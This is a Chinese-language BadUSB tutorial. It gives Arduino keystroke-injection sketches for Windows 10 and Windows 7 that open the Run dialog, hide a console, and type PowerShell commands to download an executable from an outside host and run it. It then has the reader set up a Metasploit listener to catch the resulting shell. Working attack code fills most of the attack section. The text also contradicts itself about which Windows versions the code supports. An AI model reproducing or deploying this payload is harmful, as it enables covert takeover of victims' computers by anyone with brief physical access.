badusb攻击(msfconsole)

准备

• badusb

• Arduino

下载软件

点击下载

运行软件

在工具菜单中 选择，选择badusb的端口和开发版。

注入代码

windows10系统

#include void setup() {Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(500);Keyboard.press('r');//r键delay(500);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);

}

void loop()//循环{}

windows7系统

#include void setup() {//初始化  Keyboard.begin();//开始键盘通讯   delay(5000);//延时  Keyboard.press(KEY_LEFT_GUI);//win键   delay(500);   Keyboard.press('r');//r键   delay(500);   Keyboard.release(KEY_LEFT_GUI);  Keyboard.release('r');  delay(500);   Keyboard.press(KEY_CAPS_LOCK);  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2");  delay(1000);  Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'https://bbskali.cn/8888.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);");  delay(3000);  Keyboard.println("C:\\X.EXE&EXIT");  Keyboard.press(KEY_CAPS_LOCK);  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.end();//结束键盘通讯 }void loop()//循环{}

编译上传

成功如下：

配置监听

在msf中我们配置参数，插入badusb即可得到shell,需要注意的是，本代码仅支持win10对于win7和xp由于不能直接用powershell下载，所以以上代码不能实现。

其他代码

特别鸣谢以下代码由嘉木相思提供，在此特别感谢默默为网络安全奉献的小伙伴们。

下载地址：

点击阅读原文访问下载链接